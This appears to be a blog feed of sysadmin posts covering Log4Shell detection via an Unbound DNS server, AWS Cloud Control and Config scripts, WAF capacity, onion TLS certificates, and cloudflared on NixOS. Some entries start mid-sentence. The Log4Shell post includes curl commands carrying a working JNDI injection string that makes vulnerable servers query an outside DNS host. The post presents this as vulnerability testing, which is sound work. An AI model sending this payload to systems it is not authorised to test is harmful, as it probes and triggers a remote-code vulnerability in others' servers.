time | 01:23:45 | (?<time>[\d\:]+) | |
proxy_ip | 192.168.0.2 | (?<proxy_ip>[\d\.]+) | |
year | 2021 | (?<year>\d{4}) | |
nmonth | 12 | (?<nmonth>\d{2}) | |
log_level | info | (?<log_level>\w+) | |
upstream_error | epoll_wait() reported that client prematurely closed connection, so upstream connection is closed too while sending request to upstream | (?<upstream_error>[^,]*,[^,]*) | |
remote_ip | 1.2.3.4 | (?<remote_ip>[\d\.]+) | |
server_host | example.com | (?<server_host>.[^,]*) | |
http_method | GET | (?<http_method>\w+) | |
http_path | /page.html | (?<http_path>\S+) | |
http_version | HTTP/1.1 | (?<http_version>HTTP/\d\.\d) | |
upstream_url | http://192.168.1.2:8080/page.html | (?<upstream_url>.[^"]*) | |
upstream_host | example.com | (?<upstream_host>.[^"]*) | |
referrer | https://example.com | (?<referrer>.[^"]*) |
(Edit: 12 Feb 2022) AWS CDK stack is available at curben/aws-scripts
Most of the publications discussing the Log4Shell/Log4j vulnerability ([1], [2], [3], [4]) focus on the ability to instruct the JNDI component to load remote code or download a payload using LDAP. A lesser-known fact is that Log4j also supports the DNS protocol by default, at least in versions prior to 2.15.0.
Huntress, a cyber security company, created an easy-to-use tool at log4shell.huntress.com to detect whether your server is vulnerable using LDAP. Despite the transparency of having the source code available so you could host it yourself, there's no denying that log4shell.huntress.com is a third-party service; even if anyone could host it, not everyone has the ability to audit the source code. Another third-party service that is often mentioned is dnslog.cn, which detects (as the name implies) using the DNS protocol.
Since the DNS request made by Log4j is just a simple DNS lookup (similar to a web browser's request), we can run any kind of DNS server: authoritative or recursive. A recursive DNS server is the easier option because it simply forwards requests to upstream authoritative server(s). If a server is vulnerable, we'll see its IP address in the DNS server's query logs when we attempt the exploit.
Unbound is a popular DNS server due to its simplicity. dnsmasq is another option; it was the default DNS caching resolver in Ubuntu before being replaced by systemd-resolved.
When installing a server (web, DNS, app, etc), Ubuntu usually starts the service immediately after installation. I prefer to properly configure a server before starting it, so I’m going to mask it first to prevent that auto-start.
Except for checking the service status, logs, and DNS queries, all commands require sudo privileges.
systemctl mask unbound
The above command may fail in a script; in that case, use ln -s /dev/null /etc/systemd/system/unbound.service instead.
Then, we can proceed to install and configure it.
apt update
apt install unbound
sudo -e /etc/unbound/unbound.conf.d/custom.conf
sudo -e is preferred over sudo nano for security reasons.
Paste the following config.
# Based on https://www.linuxbabe.com/ubuntu/set-up-unbound-dns-resolver-on-ubuntu-20-04-server
server:
  # the working directory.
  directory: "/etc/unbound"
  # run as the unbound user
  username: unbound
  # uncomment and increase to get more logging
  # verbosity: 2
  # log dns queries
  log-queries: yes
  # listen on all interfaces,
  interface: 0.0.0.0
  # comment out to support IPv6.
  # interface: ::0
  # answer queries from the local network only, change to your private IP
  # interface: 192.168.0.2
  # perform prefetching of almost expired DNS cache entries.
  prefetch: yes
  # respond to all IP
  access-control: 0.0.0.0/0 allow
  # IPv6
  # access-control: ::0/0 allow
  # respond to local network only, change the CIDR according to your network
  # access-control: 192.168.88.0/24 allow
  # localhost only
  # access-control: 127.0.0.1/24 allow
  # hide server info from clients
  hide-identity: yes
  hide-version: yes

remote-control:
  # Disable unbound-control
  control-enable: no

forward-zone:
  # Forward all queries to Quad9, use your favourite DNS
  name: "."
  forward-addr: 9.9.9.9
  forward-addr: 149.112.112.112
Ctrl + X to quit, Y to save, Enter to confirm.
With the above config, Unbound will respond to all IPs, including public IPs if it's exposed to the internet.
Since Unbound will listen on all interfaces, it'll interfere with systemd-resolved, which listens on 127.0.0.53:53 by default. So, systemd-resolved needs to be disabled before we start Unbound.
systemctl disable --now systemd-resolved
We also need to add the server's hostname to /etc/hosts, otherwise sudo will take a long time to execute. If you're using AWS EC2, the hostname will be "ip-a-b-c-d" where a-b-c-d is the private IP.
sudo -e /etc/hosts

# append this line
127.0.0.1 ip-a-b-c-d
The last step before we start the service is to configure the firewall to allow inbound DNS traffic. I recommend not allowing all IPs (0.0.0.0, ::0), otherwise you'll get unwanted traffic. In EC2, that means the attached security group.
After we configure the firewall, we can proceed to unmask and start the DNS server.
systemctl unmask unbound
systemctl enable --now unbound
To see whether it’s working, execute some queries:
# localhost
dig example.com @127.0.0.1

# other machine, same subnet
dig example.com @192.168.0.x

# other machine over internet
dig example.com @public-ip
Verify Unbound is logging queries:
journalctl -xe -u unbound
# Dec 14 01:23:45 ip-a-b-c-d unbound[pid]: [pid:0] info: 127.0.0.1 example.com. A IN
We are now ready to test Log4shell vulnerability.
This is an optional step to demonstrate Log4shell.
A demo vulnerable app is available as a Docker image at christophetd/log4shell-vulnerable-app. For best security practice, I recommend:
After building the image and just before you run it, configure the relevant firewall to restrict outbound connection to the Unbound DNS server only. If you prefer to use port 80 for the app server, run docker run -p 80:8080 --name vulnerable-app vulnerable-app
. Open inbound port 8080 (or port 80) in the firewall.
To test the app server is reachable, send a test request.
curl -IL app-server-ip:8080 -H 'X-Api-Version: foo'
The app server should respond with HTTP 200. The header must be X-Api-Version because that's what is configured in the log4shell-vulnerable-app.
Once the connection is verified, we can now instruct it to make a DNS request to our Unbound DNS.
curl -L app-server-ip:8080 -H 'X-Api-Version: ${jndi:dns://dns-server-ip/evil-request}'
In Unbound's log, the query should be listed.
journalctl -xe -u unbound
# Dec 14 01:23:45 ip-a-b-c-d unbound[pid]: [pid:0] info: app-server-ip evil-request. A IN
If you want to see the query log in real time, use journalctl -xe -u unbound -f
. If it’s not listed, check the inbound firewall rule applied to the DNS server.
curl -L https://target-server-domain -H 'User-Agent: ${jndi:dns://dns-server-ip/should-not-show-up-in-the-log}'
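To reduce the query log to a list of hosts that actually resolved the canary name, a rough Python sketch is shown below; it assumes the journalctl line format shown above (info: <client-ip> <query-name>. A IN) and the evil-request marker used in the earlier curl command.

#!/usr/bin/env python3
import re
import subprocess

# Pull Unbound's query log from journald; requires permission to read the journal
log = subprocess.run(
    ['journalctl', '-u', 'unbound', '--no-pager', '-o', 'cat'],
    capture_output=True, text=True
).stdout

# Example line: "[pid:0] info: 1.2.3.4 evil-request. A IN"
query = re.compile(r'info:\s+(?P<client>\S+)\s+(?P<name>\S+)\.\s+A\s+IN')

suspects = set()
for line in log.splitlines():
    m = query.search(line)
    if m and 'evil-request' in m.group('name'):
        suspects.add(m.group('client'))

print('Hosts that resolved the canary name:', sorted(suspects))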
]]>aws cloudcontrol create-resource
to launch EC2 and Lambda, instead of using aws ec2 run-instances
and aws lambda create-function
.Aside from CRUD operations, it also supports List operation to discover all deployed resources filtered by a specific resource type (e.g. AWS::ECS::Cluster
). When I first read the announcement, I wondered how it compares to AWS Config, a feature I'm actively using mainly for security audits, though it can also perform inventory tasks.
Since Cloud Control is a recent feature, the latest library is required. For the Python library, I ran pip install boto3 --upgrade to update it to version xxx. Then, I created a minimal Python script to test out Cloud Control's ListResources.
#!/usr/bin/env python
# ./cloud-control.py --profile profile-name --region region-name
from argparse import ArgumentParser
import boto3
from botocore.config import Config
from itertools import count
from json import dump, loads

parser = ArgumentParser(description = 'Find the latest AMIs.')
parser.add_argument('--profile', '-p', help = 'AWS profile name. Parsed from ~/.aws/config (SSO) or credentials (API key).', required = True)
parser.add_argument('--region', '-r', help = 'AWS Region, e.g. us-east-1', required = True)
args = parser.parse_args()

profile = args.profile
region = args.region

session = boto3.session.Session(profile_name = profile)
my_config = Config(region_name = region)
client = session.client('cloudcontrol', config = my_config)

results = []
response = {}

for i in count():
    # https://docs.aws.amazon.com/cloudcontrolapi/latest/APIReference/API_ListResources.html
    params = {
        # https://docs.aws.amazon.com/cloudcontrolapi/latest/userguide/supported-resources.html
        'TypeName': 'AWS::EC2::FlowLog'
    }
    if i == 0 or 'NextToken' in response:
        if 'NextToken' in response:
            params['NextToken'] = response['NextToken']
        response = client.list_resources(**params)
        results.extend(response['ResourceDescriptions'])
    else:
        break

prop_list = []
# Extract properties only
for ele in results:
    prop_list.append(loads(ele['Properties']))

if len(prop_list) >= 1:
    with open('cloud-control.json', 'w') as w:
        # Save the first dictionary only
        dump(dict(sorted(prop_list[0].items())), w, indent = 2)
In the first draft of the script, I noticed that the API doesn’t support AWS::EC2::Instance
yet. It took me a while to troubleshoot until I found this list of supported resources. The error wasn't very helpful, e.g. "Resource type AWS::EC2::Instance does not support LIST action"; it would be more straightforward to just say "Resource type xxx does not support Cloud Control yet".
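To make the failure easier to handle in a script, the list call can be wrapped so an unsupported type is reported and skipped. A minimal sketch; the error codes checked here are an assumption and may differ, so anything unrecognised is re-raised.

from botocore.exceptions import ClientError

def list_supported(client, type_name):
    # Return resource descriptions, or an empty list if the type is unsupported
    try:
        return client.list_resources(TypeName=type_name)['ResourceDescriptions']
    except ClientError as err:
        code = err.response['Error']['Code']
        # assumed error codes; adjust to whatever the API actually returns
        if code in ('UnsupportedActionException', 'TypeNotFoundException'):
            print(f'{type_name} does not support Cloud Control yet: {code}')
            return []
        raise

# e.g. list_supported(client, 'AWS::EC2::Instance') prints a warning instead of crashing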
The announcement did mention not all resources are supported, but I didn't expect AWS' bread and butter to be unsupported, including AWS::S3::Bucket. I'm sure these resources will be supported eventually; it's just that support for new products is prioritised at the moment, as implied by the announcement: "It will support new AWS resources typically on the day of launch".
I tested on AWS::EC2::PrefixList
, instead of the currently unsupported AWS::EC2::Instance
. It worked fine, the output syntax is exactly what the documentation outlines. To compare it to Config, I created another equivalent script.
#!/usr/bin/env python
# ./aws-config.py --profile profile-name --account-id {account-id} --region region-name
from argparse import ArgumentParser
import boto3
from botocore.config import Config
from itertools import count
from json import dump, loads

parser = ArgumentParser(description = 'Find the latest AMIs.')
parser.add_argument('--profile', '-p', help = 'AWS profile name. Parsed from ~/.aws/config (SSO) or credentials (API key).', required = True)
parser.add_argument('--account-id', '-a', help = 'AWS account ID. See ~/.aws/config if SSO is used.', required = True, type = str)
parser.add_argument('--region', '-r', help = 'AWS Region, e.g. us-east-1', required = True)
args = parser.parse_args()

profile = args.profile
account_id = args.account_id
region = args.region

session = boto3.session.Session(profile_name = profile)
my_config = Config(region_name = region)
client = session.client('config', config = my_config)

results = []
response = {}

for i in count():
    params = {
        'Expression': "SELECT configuration WHERE resourceType = 'AWS::EC2::FlowLog'" \
            f" AND accountId = '{account_id}'" \
            f" AND awsRegion = '{region}'",
        'ConfigurationAggregatorName': 'ConfigAggregator' # may need to update
    }
    if i == 0 or 'NextToken' in response:
        if 'NextToken' in response:
            params['NextToken'] = response['NextToken']
        response = client.select_aggregate_resource_config(**params)
        results.extend(response['Results'])
    else:
        break

conf_list = []
# Extract configuration only
for ele in results:
    conf_list.append(loads(ele).get('configuration', {}))

if len(conf_list) >= 1:
    with open('aws-config.json', 'w') as w:
        # Save the first dictionary only
        dump(dict(sorted(conf_list[0].items())), w, indent = 2)
Before I get to the output comparison, notice the accountId
and awsRegion
filters I used in the SQL statement. They are necessary because I'm using an aggregator that collects data from all accounts and regions in an AWS Organization (which have AWS Config enabled). Like most other AWS APIs, Cloud Control only works on one combination of account and region. If you want to discover resources across 5 combinations of account and region, that requires 5 API calls, in contrast to a single call via Config's aggregator.
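For completeness, here is roughly what the multi-call pattern looks like with Cloud Control: one client and one ListResources pagination loop per region, all within a single profile. The profile name and region list are placeholders.

import boto3

profile = 'profile-name'                     # placeholder profile
regions = ['us-east-1', 'ap-southeast-1']    # one API loop per region
type_name = 'AWS::EC2::FlowLog'

session = boto3.session.Session(profile_name = profile)
for region in regions:
    client = session.client('cloudcontrol', region_name = region)
    params = {'TypeName': type_name}
    resources = []
    while True:
        response = client.list_resources(**params)
        resources.extend(response['ResourceDescriptions'])
        if 'NextToken' not in response:
            break
        params['NextToken'] = response['NextToken']
    print(region, len(resources), 'resources')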
Here is the output of Cloud Control:
{ "DeliverLogsPermissionArn": String, "Id": String, "LogDestination": String, "LogDestinationType": String, "LogFormat": String, "LogGroupName": String, "MaxAggregationInterval": Integer, "ResourceId": String, "ResourceType": String, "Tags": [ Tag, ... ], "TrafficType": String}
Config:
{ "creationTime": Float, "deliverLogsPermissionArn": String, "deliverLogsStatus": String, "flowLogId": String, "flowLogStatus": String, "logDestination": String, "logDestinationType": String, "logFormat": String, "logGroupName": String, "maxAggregationInterval": Float, "resourceId": String, "tags": [ Tag, ... ], "trafficType": String}
Syntax used by CloudFormation template:
{ "DeliverLogsPermissionArn" : String, "LogDestination" : String, "LogDestinationType" : String, "LogFormat" : String, "LogGroupName" : String, "MaxAggregationInterval" : Integer, "ResourceId" : String, "ResourceType" : String, "Tags" : [ Tag, ... ], "TrafficType" : String}
]]>How do I check the patch level of my EC2 instances?
AWS Config is introduced as the answer to the above question, in addition to other compliance requirements. This feature enables a security analyst to query across all accounts (of an organisation) and regions through a single interface. Prior to this feature, you would use SSM to query each and every account and region, which is not efficient.
It includes a comprehensive list of AWS-managed rules, which should meet most compliance requirements, though you can also create a custom rule using a Lambda function. Depending on a company's industry and regulatory requirements, you could also utilise Conformance Packs, which are sets of AWS-managed rules designed to meet certain requirements, e.g. FDA, HIPAA, NIST, PCI DSS.
A compliance report is downloaded using a SQL statement. There are two scopes to choose from: either a chosen combination of account and region, or organisation level (also known as a Configuration Aggregator). To query resource compliance, use the AWS::Config::ResourceCompliance
resource type. There are many examples included in the Console, you could also run a custom SQL statement using Advanced Query.
In addition to resource compliance, you can also use it to build inventories. For example, you can use AWS::EC2::Instance
resource type to list all EC2 instances. So, it can function both as a compliance tool and as an inventory tool.
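As an illustration, an inventory query through the aggregator could look like the sketch below; the profile, region, and aggregator name are placeholders to adjust.

import boto3

session = boto3.session.Session(profile_name = 'profile-name')  # placeholder profile
client = session.client('config', region_name = 'us-east-1')    # aggregator's home region

response = client.select_aggregate_resource_config(
    Expression = ("SELECT accountId, awsRegion, resourceId, resourceType "
                  "WHERE resourceType = 'AWS::EC2::Instance'"),
    ConfigurationAggregatorName = 'ConfigAggregator'             # placeholder aggregator name
)
for row in response['Results']:
    print(row)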
A major limitation (as listed in the docs) is that you cannot query compliant-only (or non-compliant-only) resources of a compliance rule, e.g. AND
operator may return the result of OR
instead.
To get the actual result, you still need some post-processing to filter out irrelevant entries. I wrote a script to list all enabled rules in an organisation (aws-config-rules.py) and another script to query the output of some of those rules (aws-config.py).
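The post-processing itself is simple. A hedged sketch, assuming each entry returned by the advanced query is a JSON string whose configuration carries a complianceType field; adjust the key path to whatever your query actually returns.

from json import loads

def non_compliant_only(results):
    # results: list of JSON strings returned by select_aggregate_resource_config
    kept = []
    for raw in results:
        entry = loads(raw)
        # key path is an assumption; adjust to the actual query output
        if entry.get('configuration', {}).get('complianceType') == 'NON_COMPLIANT':
            kept.append(entry)
    return kept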
]]>While individual and total WCU are shown during ACL creation/modification on the management console, a read-only role can only check the total WCU. It may be possible to use the CheckCapacity CLI or API by separating each rule into its own ACL, but that would involve excessive (online) API calls.
I further improved my script waf-acl.py by implementing offline WCU calculation. While the AWS docs have a complete list of the WCU of each match statement, I find the text transformation part is not clear enough.
For each Text transformation that you apply, add 10 WCUs.
It implies that any time you use a text transformation, you add 10 units. When I used this assumption, my calculation was off by a mile. It is more accurate to say:
For each unique Text transformation that you apply, add 10 WCUs.
For the purpose of WCU, a text transformation is actually made up of two components: a request component and a transformation action.
For example, when URI path (request component) is transformed to lowercase (a transformation action), (URI path + lowercase) is considered one unique text transformation. (URI path + lowercase) can be applied multiple times within a rule (through nested statements) and even within an ACL; it will still be counted as one transformation only.
This means I need to account for repeated text transformations within a rule, so that each one is counted only once. This is easily achieved through the use of Python sets. The same applies when calculating the total WCU of an ACL: when a unique text transformation is shared across different rules in an ACL, the ACL's WCU will be less than the sum of all rules' WCU.
When transforming a Header, it’s counted based on a specific header. For example, rule A has (Header(User-Agent) + lowercase)
and rule B has (Header(Cookies) + lowercase)
, these are counted as two transformations, so they’ll use 20 WCUs.
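In code, the deduplication boils down to a set of (request component, transformation action) pairs. A minimal sketch of the idea; the 10 WCUs per unique pair is the figure from the docs, while the tuple encoding is only illustrative.

def text_transformation_wcu(transformations):
    # transformations: iterable of (request_component, action) pairs
    unique = set(transformations)
    return 10 * len(unique)

# (URI path + lowercase) repeated across nested statements counts once: 10 WCUs
print(text_transformation_wcu([('UriPath', 'LOWERCASE'), ('UriPath', 'LOWERCASE')]))

# Header transformations are counted per specific header: 20 WCUs
print(text_transformation_wcu([('Header:User-Agent', 'LOWERCASE'),
                               ('Header:Cookies', 'LOWERCASE')]))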
.onion
TLS certificate. The cert is of the domain validation (DV) type, significantly easier to purchase and cheaper than DigiCert's extended validation (EV) cert; DigiCert was previously the only CA that supported .onion. The post links to an excellent tutorial. Unlike the tutorial, I prefer an ECDSA cert over RSA, just like Cloudflare's cert; the tutorial also includes an nginx config, whereas I'm using the Caddy web server.
# Generate an elliptic-curve private key
$ openssl ecparam -name prime256v1 -genkey -noout -out myonion.key
# prime256v1 is also used by Cloudflare

# Generate a CSR
$ openssl req -new -key myonion.key -out myonion.csr
# Leave everything blank by entering a dot (.), except for Common Name (CN)
# Enter your onion address in CN field
respond
instead.

http://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8080 {
  bind ::1

  # Harica CA domain validation
  @harica path /.well-known/pki-validation/xxx
  respond @harica "yyy"
}
Restart Caddy and check that the path returns the correct response: curl http://localhost:8080/.well-known/pki-validation/xxx -H "Host: your-onion.onion"
After HARICA verified my onion, I received an email notification that it’s ready for purchase and download.
Download the PEM bundle.
$ cat pem-bundle.pem cross-cert.pem > fixed-pem-bundle.pem
Upload “.pem” and “.key” to the server. chown
it to the Caddy system user and chmod 600
.
Install the cert in Caddy. The site address has to be separated into HTTP and HTTPS blocks due to the use of custom ports. When a custom port is not used, Caddy listens on ports 80 and 443 by default.
# HTTP
http://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8080 {
  bind ::1

  # Redirect to HTTPS
  redir https://xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion{uri} permanent

  # HSTS (optional)
  header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"
}

# HTTPS
xw226dvxac7jzcpsf4xb64r4epr6o5hgn46dxlqk7gnjptakik6xnzqd.onion:8079 {
  bind ::1

  tls /var/lib/caddy/myonion.pem /var/lib/caddy/myonion.key

  header Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"

  @harica path /.well-known/pki-validation/xxx
  respond @harica "yyy"
}
services.tor = {
  enable = true;
  relay.onionServices = {
    myonion = {
      version = 3;
      map = [{
        port = 80;
        target = {
          addr = "[::1]";
          port = 8080;
        };
      } {
        port = 443;
        target = {
          addr = "[::1]";
          port = 8079;
        };
      }];
    };
  };
};
]]>A quick recap on two of the main components of NixOS: module and package. A package is a program available in the NixOS repository; the repo doesn't contain the binary, it's made up of nix files that describe how to compile it. In this case, cloudflared.nix is a script to download the source code from GitHub and compile it as a Go program.
A module is (usually) used to install a program as a service and make it configurable via configuration.nix
. For example, the i2pd.nix module installs the i2pd package (pkgs.i2pd
) when services.i2pd.enable
is enabled.
A major issue is that GitHub doesn't support IPv6 yet, so my IPv6-only instance couldn't download the source code. A common workaround is to mirror the repo somewhere else that does support IPv6, which is what I did. Then, I created a new custom package nix file:
{ lib, buildGoModule, fetchgit }:

buildGoModule rec {
  pname = "cloudflared";
  version = "2021.6.0";

  src = fetchgit {
    url = "https://example.com/example/cloudflared-mirror.git";
    rev = "refs/tags/${version}";
    sha256 = "sha256-cX0kdBPDgwjHphxGWrnXohHPp1nzs4SnvCry4AxMtp0=";
  };

  vendorSha256 = null;

  doCheck = false;

  buildFlagsArray = "-ldflags=-X main.Version=${version}";

  meta = with lib; {
    description = "CloudFlare Argo Tunnel daemon (and DNS-over-HTTPS client)";
    homepage = "https://www.cloudflare.com/products/argo-tunnel";
    license = licenses.unfree;
    platforms = platforms.unix;
    maintainers = [ maintainers.thoughtpolice maintainers.enorris ];
  };
}
In my cloudflared module, I updated the following lines:
  options.services.argoWeb = {
    enable = mkEnableOption "Cloudflare Argo Tunnel";
    config = mkOption {
      default = "/etc/caddy/argoWeb.yml";
      type = types.str;
      description = "Path to cloudflared config";
    };
    dataDir = mkOption {
      default = "/var/lib/argoWeb";
      type = types.path;
      description = ''
        The data directory, for storing credentials.
      '';
    };
+   package = mkOption {
+     default = pkgs.cloudflared;
+     defaultText = "pkgs.cloudflared";
+     type = types.package;
+     description = "cloudflared package to use.";
+   };
  };

- ExecStart = "${pkgs.cloudflared}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";
+ ExecStart = "${cfg.package}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";
Finally, in my configuration.nix
, I configured it to use the custom package:
  require = [ /etc/caddy/argoWeb.nix ];

  nixpkgs.config.allowUnfree = true;

  services.argoWeb = {
    enable = true;
+   package = pkgs.callPackage (import /etc/caddy/cloudflared-custom.nix) { };
    config = "/etc/caddy/argoWeb.yml";
  };
]]>The script is available here. It currently only supports CloudFront ACLs; feel free to extend it to support regional ACLs.
(Edit: 1 Sep 2021) regional ACL is now supported.
The underlying format of a web ACL is JSON. In this use case, I'm only concerned with two keys:
{ "Name": "", "Rules": [ { "Name": "", "Statement": {}, "Action": { "Block": {} } }, { "Name": "", "Statement": {}, "Action": { "Allow": {} } } ]}
The script names each ACL according to the value of “Name”. “Rules” is an array of objects, where each object represents a rule. Each rule has an action of count, allow or block.
In each rule, there is a statement that functions as a matching condition. Each statement can contain one or more match statements combined using logical operators (AND, NOT, OR).
A converted ACL is an array of objects; each object has three keys.
[ { "Name": "", "Action": "", "Rule": "" }]
{ "Name": "ruleA", "Statement": { "OrStatement": { "Statements": [ { "foo": {} }, { "bar": {} } ] } }}
{ "ruleA": "foo OR bar"}
{ "Name": "ruleA", "Statement": { "AndStatement": { "Statements": [ { "OrStatement": { "Statements": [ { "foo": {} }, { "bar": {} } ] } }, { "baz": {} } ] } }}
{ "ruleA": "(foo OR bar) AND baz"}
{ "Name": "ruleA", "Statement": { "NotStatement": { "Statement": { "foo": {} } } }}
{ "ruleA": "NOT foo"}
{ "ByteMatchStatement": { "SearchString": ".conf", "FieldToMatch": { "UriPath": {} }, "PositionalConstraint": "ENDS_WITH" }}
UriPath=ENDSWITH(.conf)
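The conversion behind these examples is a small recursion over the statement tree. The sketch below mirrors the idea, except that it renders a leaf statement as its key name only, whereas waf-acl.py expands the details (as in the ByteMatch example above).

def to_expression(statement):
    # statement: a (possibly nested) WAFv2 statement dict
    (kind, body), = statement.items()
    if kind == 'AndStatement':
        return ' AND '.join(wrap(s) for s in body['Statements'])
    if kind == 'OrStatement':
        return ' OR '.join(wrap(s) for s in body['Statements'])
    if kind == 'NotStatement':
        return 'NOT ' + wrap(body['Statement'])
    return kind  # leaf match statement; the real script renders its details

def wrap(statement):
    # parenthesise compound sub-expressions so precedence stays readable
    expr = to_expression(statement)
    return f'({expr})' if ' ' in expr else expr

rule = {'AndStatement': {'Statements': [
    {'OrStatement': {'Statements': [{'foo': {}}, {'bar': {}}]}},
    {'baz': {}}]}}
print(to_expression(rule))  # (foo OR bar) AND baz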
]]>It operates through a Cloudflare daemon (cloudflared) that a user installs on a server. The daemon creates outbound tunnel(s) to the CDN and forwards incoming requests to the local web server. It has been available for free since April 2021. However, the latest NixOS at that time was 20.09 and it shipped an older version of the daemon that didn't support static tunnels.
Static tunnel is a feature introduced in v2020.9.3 that associates a tunnel with a static subdomain (UUID.cfargotunnel.com) that a user can CNAME a website to; without this feature, cloudflared had to recreate the DNS record every time a tunnel reconnected.
I can now use the newer daemon after my recent upgrade to NixOS 21.05.
Generate a new cert.pem from the dashboard. This is only required to create a new tunnel. When creating a new tunnel, cloudflared also generates a credentials file (UUID.json) that you use to run the tunnel, so you don't have to upload the cert.pem to your server. Since a tunnel can be created anywhere, you can do it from your workstation.
Grab the cloudflared binary from Cloudflare and make it executable without installing it to “/usr/bin”.
This step can be done on your local machine; the actual installation on a server comes later. Once the cloudflared binary and cert.pem are downloaded, proceed to create a new tunnel.
./cloudflared tunnel --origincert cert.pem create mytunnel
A new UUID.json will be generated in the current folder.
Create a new yml file.
tunnel: mytunnel
credentials-file: /var/lib/argoWeb/uuid.json
# Optional
# loglevel: warning

ingress:
  - hostname: mdleom.com
    service: http://localhost:4430
  - hostname: www.mdleom.com
    service: http://localhost:4430
  - service: http_status:404
The last entry is intentionally left without a hostname
key as required by cloudflared. Usually, it’s configured with http_status:404
so cloudflared returns that status if there is no matching destination hostname for an incoming request. This can happen when, say, you have a foo.example.com DNS record that points to the daemon, so the incoming request does reach the daemon, but either you forgot to configure the daemon to route the traffic to the actual foo.example.com web server, or the web server is not running at all. In that case, the daemon returns an HTTP 404 status.
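Conceptually, the ingress matching is "first rule whose hostname matches, otherwise the last catch-all rule". A toy Python simulation of that behaviour using the config above; the real cloudflared also supports wildcards and path rules, which this ignores.

ingress = [
    {'hostname': 'mdleom.com', 'service': 'http://localhost:4430'},
    {'hostname': 'www.mdleom.com', 'service': 'http://localhost:4430'},
    {'service': 'http_status:404'},   # catch-all, no hostname key
]

def route(host):
    # return the service of the first matching rule; the catch-all matches anything
    for rule in ingress:
        if rule.get('hostname') in (None, host):
            return rule['service']

print(route('www.mdleom.com'))    # http://localhost:4430
print(route('foo.example.com'))   # http_status:404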
Create a new user and group named “argoWeb” in the server.
users = {
  users = {
    argoWeb = {
      home = "/var/lib/argoWeb";
      createHome = true;
      isSystemUser = true;
      group = "argoWeb";
    };
  };
  groups = {
    caddyProxy.members = [ "argoWeb" ];
  };
};
Once argoWeb
is created via nixos-rebuild, upload and move the json file to “/var/lib/argoWeb” folder. chown argoWeb:argoWeb
and chmod 600
that file.
Then, create a new nix file; in this case, I'm using the "/etc/caddy/" folder (where I put other *.nix files):
{ config, lib, pkgs, ... }:

with lib;

let
  cfg = config.services.argoWeb;
in
{
  options.services.argoWeb = {
    enable = mkEnableOption "Cloudflare Argo Tunnel";
    config = mkOption {
      default = "/etc/caddy/argoWeb.yml";
      type = types.str;
      description = "Path to cloudflared config";
    };
    dataDir = mkOption {
      default = "/var/lib/argoWeb";
      type = types.path;
      description = ''
        The data directory, for storing credentials.
      '';
    };
    package = mkOption {
      default = pkgs.cloudflared;
      defaultText = "pkgs.cloudflared";
      type = types.package;
      description = "cloudflared package to use.";
    };
  };

  config = mkIf cfg.enable {
    systemd.services.argoWeb = {
      description = "Cloudflare Argo Tunnel";
      after = [ "network-online.target" ];
      wants = [ "network-online.target" ]; # systemd-networkd-wait-online.service
      wantedBy = [ "multi-user.target" ];
      serviceConfig = {
        ExecStart = "${cfg.package}/bin/cloudflared --config ${cfg.config} --no-autoupdate tunnel run";
        Type = "simple";
        User = "argoWeb";
        Group = "argoWeb";
        Restart = "on-failure";
        RestartSec = "5s";
        NoNewPrivileges = true;
        LimitNPROC = 512;
        LimitNOFILE = 1048576;
        PrivateTmp = true;
        PrivateDevices = true;
        ProtectHome = true;
        ProtectSystem = "full";
        ReadWriteDirectories = cfg.dataDir;
      };
    };
  };
}
Move the yml file to “/etc/caddy/“ and set both yml and nix files to be chown root:root
and chmod 644
.
Bind the web server to localhost ("127.0.0.1" or "::1") and optionally disable TLS. If Cloudflare's authenticated origin pull (client authentication) is configured, that should still work if you prefer to leave TLS on, though I haven't tested it. You don't have to bind it to localhost if you insist, but it defeats the security purpose of Argo.
mdleom.com:4430 www.mdleom.com:4430 {
  bind 127.0.0.1

  tls /var/lib/caddyProxy/mdleom.com.pem /var/lib/caddyProxy/mdleom.com.key {
    protocols tls1.3
    client_auth {
      mode require_and_verify
      trusted_ca_cert_file /var/lib/caddyProxy/origin-pull-ca.pem
    }
  }
}
Restart/reload Caddy for the changed config to take effect.
If your NixOS instance is IPv6-only, you may want to use a custom package. pkgs.cloudflared
is installed by compiling the source from the GitHub repo, instead of using a cached binary from the Nix repo. cloudflared's license restricts the distribution of the binary, hence the need for source compilation. However, GitHub doesn't support IPv6 yet, so we need to mirror its repo to another Git host that supports IPv6 and then download it from there.
require = [
  /etc/caddy/argoWeb.nix
];

# cloudflared is not distributed via a free software license
nixpkgs.config.allowUnfree = true;

services.argoWeb = {
  enable = true;
  config = "/etc/caddy/argoWeb.yml";
  # custom package
  # package = pkgs.callPackage (import /etc/caddy/cloudflared-custom.nix) { };
};
The last step is to create a new DNS record to CNAME the relevant hostname to UUID.cfargotunnel.com. Existing A/CNAME records must be removed beforehand, since a hostname cannot have both A and CNAME records at the same time, nor have two identical CNAMEs.
]]>Either isNormalUser
or isSystemUser
must now be set. This mainly affects service users (users created solely to run a service).
  users = {
    users = {
      fooService = {
        home = "/var/www";
        createHome = true;
+       isSystemUser = true;
      };
    };
  };
I have a “/var/www“ folder which I use to serve this website. Previously, chmod +xr
was persistent, but now NixOS always sets the permission of a user's home folder to chmod 700
every time nixos-rebuild
is executed. As a workaround, I have to configure nix to execute chmod after nixos-rebuild
and during boot.
system.activationScripts = {
  www-data.text = ''
    chmod +xr "/var/www"
  '';
};
Some settings have been renamed:
map.*.toHost
→ map.*.target.addr
  services.tor = {
    enable = true;
    enableGeoIP = false;
-   hiddenServices = {
-     myOnion = {
-       version = 3;
-       map = [
-         {
-           port = "80";
-           toHost = "[::1]";
-           toPort = "8080";
-         }
-       ];
-     }
-   }
-   extraConfig =
-     ''
-       ClientUseIPv4 0
-       ClientUseIPv6 1
-       ClientPreferIPv6ORPort 1
-     '';
+   relay.onionServices = {
+     myOnion = {
+       version = 3;
+       map = [{
+         port = 80;
+         target = {
+           addr = "[::1]";
+           port = 8080;
+         };
+       }];
+     };
+   };
+   settings = {
+     ClientUseIPv4 = false;
+     ClientUseIPv6 = true;
+     ClientPreferIPv6ORPort = true;
+   };
  };
]]>